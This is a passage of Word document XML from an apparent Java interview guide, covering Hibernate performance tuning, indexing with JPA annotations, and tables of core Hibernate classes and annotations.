                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (EhCache, Infinispan) to avoid DB hits</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="7465B2CE" w14:textId="77777777" w:rsidTr="00EA7E01">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34E72C89"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Lazy Loading</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="23A4628E"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oad only what’s needed using @OneToMany(fetch = FetchType.LAZY) etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="3228E55C" w14:textId="77777777" w:rsidTr="00EA7E01">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C898523"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Batch Fetching</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42C59D1B"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Reduce number of SQL queries with @BatchSize(size = N)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="2D46BBB3" w14:textId="77777777" w:rsidTr="00EA7E01">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65F3B803"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Pagination</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51E730C4"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Use setFirstResult() and setMaxResults() for large datasets</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="79EA234D" w14:textId="77777777" w:rsidTr="00EA7E01">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D9B9C78"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Fetch Joins</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25CE644A"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Use optimized HQL joins to avoid N+1 query problem</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="4EF860C7" w14:textId="77777777" w:rsidTr="00EA7E01">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2659388F"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onnection Pooling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47DB9BE4"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Use HikariCP, C3P0 for efficient DB connection handling</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="1D80496D" w14:textId="77777777" w:rsidTr="00EA7E01">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29A5A22A"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DTO Projections</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="524AE000"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Fetch only required columns instead of whole entities</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="05147EFB" w14:textId="77777777" w:rsidTr="00EA7E01">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D8DA3E0"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Use StatelessSession</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1DD4BAF1"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hen no tracking of object changes is needed, for read-only scenarios</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="1DE67E85" w14:textId="77777777" w:rsidTr="00EA7E01">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E5804F9"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Enable SQL Logging Carefully</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11C3C197"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Avoid enabling in production due to performance impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2E9084CA" w14:textId="77777777" w:rsidR="00EA7E01"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21E116">
          <v:rect id="_x0000_i2430" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7943165E" w14:textId="77777777" w:rsidR="00EA7E01" w:rsidRPr="007F3379" w:rsidRDefault="00EA7E01"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2. Indexing in Hibernate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBDFDF3"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ndexes improve query performance on large tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC4190A" w14:textId="77777777" w:rsidR="00EA7E01" w:rsidRPr="007F3379" w:rsidRDefault="00EA7E01"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a. Database-Level Indexing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A014C3B" w14:textId="77777777" w:rsidR="00EA7E01" w:rsidRPr="007F3379" w:rsidRDefault="00EA7E01" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1982"/>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reate indexes in the database manually or via schema generation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED644BC" w14:textId="77777777" w:rsidR="00EA7E01" w:rsidRPr="007F3379" w:rsidRDefault="00EA7E01" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1982"/>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Helps speed up </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WHERE</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JOIN</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ORDER BY</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1796D8" w14:textId="77777777" w:rsidR="00EA7E01" w:rsidRPr="007F3379" w:rsidRDefault="00EA7E01"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b. Using JPA/Hibernate Annotations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D02BF4D"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ntity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D71B6DB"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able(name = "employee", indexes = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E80A6C7"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Index(name = "idx_emp_name", columnList = "name"),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088B1B7B"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Index(name = "idx_emp_dept", columnList = "department")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA9E279"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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F621CEB"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ublic class Employee {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11FC1880"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fields</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4491A9" w14:textId="77777777" w:rsidR="00EA7E01" w:rsidRPr="007F3379" w:rsidRDefault="00EA7E01"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lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5494CBD9" w14:textId="77777777" w:rsidR="00EA7E01" w:rsidRPr="007F3379" w:rsidRDefault="00EA7E01"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c. Full-Text Search (Optional - Advanced)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5D1A4C" w14:textId="77777777" w:rsidR="00EA7E01" w:rsidRPr="007F3379" w:rsidRDefault="00EA7E01" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1983"/>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For full-text indexing, use </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Hibernate Search</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Apache Lucene or Elasticsearch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC6C6F9" w14:textId="77777777" w:rsidR="00EA7E01"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3C4B546">
          <v:rect id="_x0000_i2431" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCC37EA" w14:textId="77777777" w:rsidR="00EA7E01" w:rsidRPr="007F3379" w:rsidRDefault="00EA7E01"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Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E89F6C8" w14:textId="77777777" w:rsidR="00EA7E01" w:rsidRPr="007F3379" w:rsidRDefault="00EA7E01" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1984"/>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Performance tuning</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Hibernate involves optimizing fetching strategies, minimizing DB hits, and reducing memory/connection overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCD2A5A" w14:textId="77777777" w:rsidR="00EA7E01" w:rsidRPr="007F3379" w:rsidRDefault="00EA7E01" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1984"/>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Indexing</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> helps speed up query performance by allowing the database to quickly locate data rows. It’s recommended for frequently queried columns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8747F1" w14:textId="450DBBAC" w:rsidR="00C97E60" w:rsidRPr="00CE4B95"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4FC7B29">
          <v:rect id="_x0000_i2432" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E792FF1" w14:textId="5D138CA6" w:rsidR="00092BE3" w:rsidRPr="00CE4B95" w:rsidRDefault="00092BE3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="550" w:name="_Toc196308030"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain different classes and annotations in hibernate?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="550"/>
    </w:p>
    <w:p w14:paraId="53B7AED7" w14:textId="1DAA65B5" w:rsidR="00702DEA" w:rsidRPr="007F3379" w:rsidRDefault="00702DEA" w:rsidP="007F3379">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Key Classes and Annotations in Hibernate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BB4E2A" w14:textId="77777777" w:rsidR="00702DEA"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5AACB84">
          <v:rect id="_x0000_i2433" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B275DA" w14:textId="77777777" w:rsidR="00702DEA" w:rsidRPr="007F3379" w:rsidRDefault="00702DEA"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Core Classes in Hibernat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6"/>
        <w:gridCol w:w="5391"/>
      </w:tblGrid>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="28923CE6" w14:textId="77777777" w:rsidTr="00702DEA">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D6008CE" w14:textId="77777777" w:rsidR="00702DEA" w:rsidRPr="007F3379" w:rsidRDefault="00702DEA"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Class / Interface</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="483EB428" w14:textId="77777777" w:rsidR="00702DEA" w:rsidRPr="007F3379" w:rsidRDefault="00702DEA"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Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="2D95D2E0" w14:textId="77777777" w:rsidTr="00702DEA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D36F948"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onfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1105FBB4"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oads Hibernate config (hibernate.cfg.xml), bootstrap class</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="62145E9A" w14:textId="77777777" w:rsidTr="00702DEA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="67C7B4D6"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Factory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7371714C"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Factory for Session, created once per application</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="52B5CE64" w14:textId="77777777" w:rsidTr="00702DEA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="427E2CA9"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D842CC0"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Represents a single unit of work, handles DB operations</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="511F10EA" w14:textId="77777777" w:rsidTr="00702DEA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="23BBA9EC"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ransaction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7172832C"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Manages transactions within a session</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="270E7F83" w14:textId="77777777" w:rsidTr="00702DEA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2FD8CA6F"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 / TypedQuery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2ADACD9B"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Used to create and execute HQL/JPQL queries</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="3DCCA884" w14:textId="77777777" w:rsidTr="00702DEA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="723E9403"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riteriaBuilder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65C1259B"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Used to create dynamic, type-safe queries (JPA Criteria API)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6F69976F" w14:textId="77777777" w:rsidR="00702DEA"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44E45AC">
          <v:rect id="_x0000_i2434" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E3621A" w14:textId="77777777" w:rsidR="00702DEA" w:rsidRPr="007F3379" w:rsidRDefault="00702DEA"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Important Hibernate / JPA Annotations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E37651F" w14:textId="77777777" w:rsidR="00702DEA" w:rsidRPr="007F3379" w:rsidRDefault="00702DEA"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Entity Mapp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55"/>
        <w:gridCol w:w="4907"/>
      </w:tblGrid>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="47478210" w14:textId="77777777" w:rsidTr="00702DEA">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E2F42C2" w14:textId="77777777" w:rsidR="00702DEA" w:rsidRPr="007F3379" w:rsidRDefault="00702DEA"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Annotation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5620E6EA" w14:textId="77777777" w:rsidR="00702DEA" w:rsidRPr="007F3379" w:rsidRDefault="00702DEA"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Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="6D81A8C7" w14:textId="77777777" w:rsidTr="00702DEA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D557E99"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ntity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73E684CD"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Marks a class as an entity mapped to a DB table</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="79FCC231" w14:textId="77777777" w:rsidTr="00702DEA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2234C152"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able(name="...")</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5CE93756"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pecifies table name and optional indexes/constraints</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="1A7D6755" w14:textId="77777777" w:rsidTr="00702DEA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="70B2DDD7"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d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="18F56DAE"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Defines primary key</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="3BD98EB8" w14:textId="77777777" w:rsidTr="00702DEA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57F1E76B"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GeneratedValue</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7647CEE8"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Defines auto-generation strategy for primary key</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="7D11C3F7" w14:textId="77777777" w:rsidTr="00702DEA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24450D2D"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olumn(name="...")</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="08173325"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Maps class field to table column</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="79168BEA" w14:textId="77777777" w:rsidTr="00702DEA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D97DD68"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ransient</w:t>
            </w:r>
          </w:p>
